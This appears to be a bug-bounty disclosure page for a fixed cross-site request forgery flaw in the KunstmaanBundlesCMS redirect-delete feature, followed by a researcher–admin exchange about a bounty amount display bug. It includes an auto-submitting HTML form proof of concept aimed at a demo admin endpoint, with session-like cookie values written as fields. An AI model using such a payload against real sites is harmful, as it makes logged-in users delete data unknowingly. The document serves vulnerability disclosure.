Cross-Site Request Forgery (CSRF) in kunstmaan/kunstmaanbundlescms

Valid

Reported on

Oct 8th 2021


Description

Cross site request forgery in Kunstmaan/KunstmaanBundlesCMS

Proof of Concept

  1. Delete function in "redirects" feature --> vulnarebility is in parameter id

<!DOCTYPE html>

<html>

<body>

<form method="POST" action="https://demo.bundles.kunstmaan.be:443/en/admin/settings/redirect/2/delete">

    <input type="text" name="kumademosite" value="4ujovmlg3srgpe6isfa6lekp2h">

    <input type="text" name="_ga" value="GA1.4.1289160424.1633619657">

    <input type="text" name="_gid" value="GA1.4.600622046.1633619657">

    <input type="text" name="demosite-message" value="true">

    <input type="text" name="delete" value="">

    <input type="submit" value="Send">

<script>

  document.forms[0].submit();

</script>

</form>

</body>

</html>

Impact

In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer. Depending on the nature of the action, the attacker might be able to gain full control over the user's account. If the compromised user has a privileged role within the application, then the attacker might be able to take full control of all the application's data and functionality.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the kunstmaan/kunstmaanbundlescms team and are waiting to hear back 2 months ago
kunstmaan/kunstmaanbundlescms maintainer validated this vulnerability 2 months ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Asura-N
2 months ago

Researcher


Hi @admin may i know why the disclosure bounty is reduced?

Jamie Slome
2 months ago

Admin


@asura-n - the maintainer selected a bounty of $9, but with your permalinks, the upper bound is $28. I will look into the decimal bug.

Asura-N
a month ago

Researcher


Hi @admin can you round it as $29 , there is a problem here today is a payday , but i recieved mail awarded as $9 (instead of $28.800000000004) can you please check once and sort out the issue

Thanks & Regards Asura-N

Jamie Slome
a month ago

Admin


@asura-n - we will fix the bounty amount. This is a visual bug, and we are taking a look at it now! ♥️

You will be awarded only $9 until the fix is confirmed by the maintainer. Once the maintainer confirms the fix, we will work out the final bounty to be awarded, and pay you for each permalink bounty (20%), where your permalink reflects a point in code that has been fixed by the maintainer.

Let me know if this answers your questions! 💜

Asura-N
a month ago

Researcher


Ok got it, thanks @admin for your quick response.

kunstmaan/kunstmaanbundlescms maintainer confirmed that a fix has been merged on 4f5612 a month ago
The fix bounty has been dropped